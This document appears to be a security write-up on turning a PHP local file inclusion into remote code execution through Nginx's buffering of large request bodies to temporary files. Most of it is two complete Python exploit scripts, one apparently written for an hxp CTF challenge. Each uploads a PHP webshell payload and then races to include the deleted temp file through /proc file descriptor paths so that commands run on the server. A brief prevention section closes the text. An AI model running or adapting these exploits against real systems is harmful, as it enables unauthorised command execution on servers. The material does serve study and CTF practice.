Fortunately, PHP is nowadays frequently deployed behind Nginx with PHP-FPM. Nginx offers an easily overlooked client body buffering feature: if a client body (not limited to POST requests) is larger than a certain threshold, Nginx writes it to a temporary file.
This feature makes it possible to exploit LFIs even when there is no other way to create files on the target, as long as Nginx runs as the same user as PHP (which is very commonly the case, e.g. www-data).
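As a rough sketch (the target URL and the `file` parameter name are hypothetical here, chosen to match the exploits below), simply sending a request body well above the buffering threshold, roughly 8–16 KB by default, is enough to make Nginx spill it into a file under its client body temp path (e.g. `/var/lib/nginx/body/` on Debian-based builds):

```python
# Minimal sketch (hypothetical target URL): force Nginx to buffer the request
# body to a temporary file by making it larger than client_body_buffer_size.
import requests

TARGET = 'http://target.example/'          # hypothetical vulnerable LFI endpoint
payload = '<?php system($_GET["c"]); /*'   # PHP payload; the trailing /* comments out the padding

# Pad the body past the buffering threshold (~8-16 KB by default) so that
# Nginx writes it to /var/lib/nginx/body/<N> before handing it to PHP-FPM.
requests.get(TARGET, data=payload + 'A' * (16 * 1024))
```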
The temporary file is unlinked immediately after Nginx opens it. Fortunately, procfs can still be used to obtain a reference to the deleted file by winning a race.
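For illustration, here is a minimal sketch, assuming local shell access on the server as the same user as Nginx (or root), that lists worker file descriptors still pointing at deleted client body files:

```python
# Illustration only: run locally on the server to see that a deleted
# /var/lib/nginx/body/<N> file is still reachable through the worker's fd table.
import os

nginx_pid = 34  # example worker PID, as in the text below
fd_dir = f'/proc/{nginx_pid}/fd'
for fd in os.listdir(fd_dir):
    try:
        target = os.readlink(os.path.join(fd_dir, fd))
    except OSError:
        continue
    if '/var/lib/nginx/body/' in target:
        # e.g. "/var/lib/nginx/body/0000001368 (deleted)"
        print(fd, '->', target)
```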
Note: /proc/34/fd/15 cannot be included directly in this example, because PHP's include function would resolve the path to /var/lib/nginx/body/0000001368 (deleted), which does not exist on the filesystem. Fortunately, this minor restriction can be bypassed with some indirection, such as /proc/self/fd/34/../../../34/fd/15, which will ultimately execute the content of the deleted file /var/lib/nginx/body/0000001368.
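The exploit below brute-forces exactly this kind of path; as a small sketch, the candidate paths can be generated from a worker PID and a guessed file descriptor (the helper name here is illustrative, not part of the original exploit):

```python
# Sketch of the procfs indirection used below: the extra /proc/self/fd/<pid>
# hop plus ../../../ works around include()'s readlink/stat resolution of the
# fd symlink to its "... (deleted)" target (see the exploit comment below).
def build_include_path(nginx_pid: int, fd: int) -> str:
    return f'/proc/self/fd/{nginx_pid}/../../../{nginx_pid}/fd/{fd}'

print(build_include_path(34, 15))
# /proc/self/fd/34/../../../34/fd/15
```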
## Full Exploit
```python
#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r = requests.get(URL, params={'file': '/proc/cpuinfo'})
cpus = r.text.count('processor')

r = requests.get(URL, params={'file': '/proc/sys/kernel/pid_max'})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r = requests.get(URL, params={'file': f'/proc/{pid}/cmdline'})

    if b'nginx: worker process' in r.content:
        print(f'[*] nginx worker found: {pid}')

        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] starting uploader')
    while not done:
        requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')

for _ in range(16):
    t = threading.Thread(target=uploader)
    t.start()

# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid):
    global done

    while not done:
        print(f'[+] brute loop restarted: {pid}')
        for fd in range(4, 32):
            f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
            r = requests.get(URL, params={'file': f, 'c': 'id'})
            if r.text:
                print(f'[!] {f}: {r.text}')
                done = True
                exit()

for pid in nginx_workers:
    a = threading.Thread(target=bruter, args=(pid,))
    a.start()
```
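The script takes the target host and port as command-line arguments (e.g. `python3 exploit.py target.example 80`) and assumes the vulnerable application includes whatever path is supplied in the `file` query parameter; the injected PHP then runs the command passed in the `c` parameter (here `id`).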
# Local File Inclusion to Remote Code Execution via Nginx Temporary Files

When a PHP application includes attacker-controlled file paths and Nginx buffers large client bodies to temporary files, that buffering behaviour can be abused to turn the local file inclusion into remote code execution, even though the attacker never writes a regular file to disk themselves.

## Exploitation

The attacker sends a large request body that begins with a PHP payload, forcing Nginx to write it to a client body temporary file, and then races to include that (already deleted) file through procfs references to the worker's file descriptors, as described above.

## Prevention

Never pass user-controlled input to include/require or similar functions; strictly validate and allow-list file paths. Running Nginx and PHP-FPM as different users also breaks this particular technique, since PHP can then no longer read Nginx's file descriptors via procfs.
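A second exploit for the same technique, apparently written for an hxp CTF challenge (it looks for an `hxp{...}` flag and calls a `/readflag` binary), follows the same idea but spreads the body uploads over all CPUs and prefixes each included path with a random chain of `/proc/<nginx pid>/cwd` and `/proc/<nginx pid>/root` components: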
```python
import requests
import threading
import multiprocessing
import random

SERVER = "http://localhost:8088"
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
# Set the following to True to use the above set of PIDs instead of scanning:
USE_NGINX_PIDS_CACHE = False

def create_requests_session():
    session = requests.Session()
    # Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
    adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
    session.mount('http://', adapter)
    return session

def get_nginx_pids(requests_session):
    if USE_NGINX_PIDS_CACHE:
        return NGINX_PIDS_CACHE
    nginx_pids = set()
    # Scan up to PID 200
    for i in range(1, 200):
        cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
        if cmdline.startswith("nginx: worker process"):
            nginx_pids.add(i)
    return nginx_pids

def send_payload(requests_session, body_size=1024000):
    try:
        # The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
        payload = '<?php system("/readflag"); ?> //'
        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
    except:
        pass

def send_payload_worker(requests_session):
    while True:
        send_payload(requests_session)

def send_payload_multiprocess(requests_session):
    # Use all CPUs to send the payload as request body for Nginx
    for _ in range(multiprocessing.cpu_count()):
        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
        p.start()

def generate_random_path_prefix(nginx_pids):
    # This method creates a path from a random amount of ProcFS path components. A generated path will look like
    # /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
    path = ""
    component_num = random.randint(0, 10)
    for _ in range(component_num):
        pid = random.choice(nginx_pids)
        if random.randint(0, 1) == 0:
            path += f"/proc/{pid}/cwd"
        else:
            path += f"/proc/{pid}/root"
    return path

def read_file(requests_session, nginx_pid, fd, nginx_pids):
    nginx_pid_list = list(nginx_pids)
    while True:
        path = generate_random_path_prefix(nginx_pid_list)
        path += f"/proc/{nginx_pid}/fd/{fd}"
        try:
            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
        except:
            continue
        # Flags are formatted as hxp{<flag>}
        if "hxp" in d:
            print("Found flag! ")
            print(d)

def read_file_worker(requests_session, nginx_pid, nginx_pids):
    # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
    for fd in range(10, 45):
        thread = threading.Thread(target=read_file, args=(requests_session, nginx_pid, fd, nginx_pids))
        thread.start()

def read_file_multiprocess(requests_session, nginx_pids):
    for nginx_pid in nginx_pids:
        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
        p.start()

if __name__ == "__main__":
    print('[DEBUG] Creating requests session')
    requests_session = create_requests_session()
    print('[DEBUG] Getting Nginx pids')
    nginx_pids = get_nginx_pids(requests_session)
    print(f'[DEBUG] Nginx pids: {nginx_pids}')
    print('[DEBUG] Starting payload sending')
    send_payload_multiprocess(requests_session)
    print('[DEBUG] Starting fd readers')
    read_file_multiprocess(requests_session, nginx_pids)
```
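The `action=read`/`action=include` endpoints, the `hxp{...}` flag format, and the `/readflag` binary are specific to the CTF setup this script targets and would have to be adapted for other applications. The random procfs prefix built by `generate_random_path_prefix` presumably serves the same purpose as the `../../../` indirection in the first exploit: the included path never points at `/proc/<pid>/fd/<fd>` directly, so PHP's path handling does not resolve it straight to the deleted `/var/lib/nginx/body` target.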